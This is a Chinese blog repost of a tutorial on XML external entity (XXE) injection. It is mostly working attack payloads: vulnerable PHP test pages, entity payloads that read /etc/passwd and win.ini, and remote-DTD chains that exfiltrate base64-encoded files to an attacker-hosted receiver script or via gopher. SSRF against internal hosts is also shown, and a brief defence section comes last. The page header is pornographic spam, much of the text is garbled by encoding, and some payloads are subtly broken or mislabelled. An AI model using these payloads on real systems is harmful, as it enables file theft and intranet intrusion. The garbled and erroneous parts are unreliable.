日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程语言 > asp.net >内容正文

asp.net

XML实体注入漏洞

發(fā)布時(shí)間:2024/1/23 asp.net 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XML实体注入漏洞 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

XML實(shí)體注入漏洞

測(cè)試代碼1:新建xmlget.php,復(fù)制下面代碼

<?php $xml=$_GET['xml']; $data=simplexml_load_string($xml); print_r($data); ?>

漏洞測(cè)試?yán)梅绞?:有回顯,直接讀取文件

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>

LINUX:

http://192.168.106.154/xml/example1.php?xml=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file:///etc/passwd">]><aa>&name;</aa>

讀取passwd文件,需URL編碼后執(zhí)行。

windows:

http://192.168.106.208/xxe1.php?xml=<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file///C:/windows/win.ini" >]> <root> <name>&xxe;<name> </root>

讀取文件、也可以讀取到內(nèi)容D盤的文件夾,形式如:file:///d:/

URL編碼后可執(zhí)行:

http://192.168.106.208/xxe1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-

8%22%3F%3E%20%0A%3C%21DOCTYPE%20xxe%20%5B%0A%3C%21ELEMENT%20name%20ANY

%20%3E%0A%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fwindows%2fwin.ini

%22%20%3E%5D%3E%0A%3Croot%3E%0A%3Cname%3E%26xxe%3B%3C%2fname%3E%0A%3C%2

froot%3E

漏洞測(cè)試?yán)梅绞?:無(wú)回顯,引用遠(yuǎn)程服務(wù)器上的XML文件讀取文件

將以下1.xml保存到WEB服務(wù)器下

1.xml

<!ENTITY % a SYSTEM "file:///etc/passwd">

<!ENTITY % b "<!ENTITY % c SYSTEM 'gopher://xxe.com/%a;'>"> %b; %c

Payload:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml">

%remote;]>

http://localhost/ceshi/xmlget.php?xml=<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://localhost/ceshi/evil.dtd">%d;]><aa>&b;</aa>

evil.dtd文件: <!ENTITY b SYSTEM "file:///F:linux/1.txt">

漏洞測(cè)試?yán)梅绞?:

在主機(jī)上放一個(gè)接收文件的php(get.php):

<?php file_put_contents('01.txt', $_GET['xxe_local']); ?>

1.xml內(nèi)容:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://192.168.106.208/dede/get.php?id=%payload;'>"> %int; %trick;

Payload:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml"> %remote;]>

網(wǎng)站目錄下生成01.txt,將內(nèi)容進(jìn)行base64編碼,獲取內(nèi)容。

測(cè)試代碼2:

新建一個(gè)xmltest.php,復(fù)制下面內(nèi)容,直接訪問(wèn)該文件可以讀取file文件內(nèi)容。

<?php $xml=<<<EOF <?xml version="1.0" ?> <!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///F:/linux/1.txt"> ]> <x>&xxe;</x> EOF; $data = simplexml_load_string($xml); print_r($data) ?>

讀取任意文件

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>

執(zhí)行系統(tǒng)命令

在安裝expect擴(kuò)展的PHP環(huán)境里執(zhí)行系統(tǒng)命令,其他協(xié)議也有可能可以執(zhí)行系統(tǒng)命令

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]> <root> <name>&xxe;</name> </root>

攻擊內(nèi)網(wǎng)網(wǎng)站

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]> <root> <name>&xxe;</name> </root>

防御XXE攻擊

方案一、使用開發(fā)語(yǔ)言提供的禁用外部實(shí)體的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python:

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二、過(guò)濾用戶提交的XML數(shù)據(jù)

關(guān)鍵詞: <!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

參考鏈接:

http://www.freebuf.com/articles/web/86007.html??黑客制造:XXE漏洞自動(dòng)挖掘工具

https://security.tencent.com/index.php/blog/msg/69? ? 未知攻焉知防——XXE漏洞攻防?

?

總結(jié)

以上是生活随笔為你收集整理的XML实体注入漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。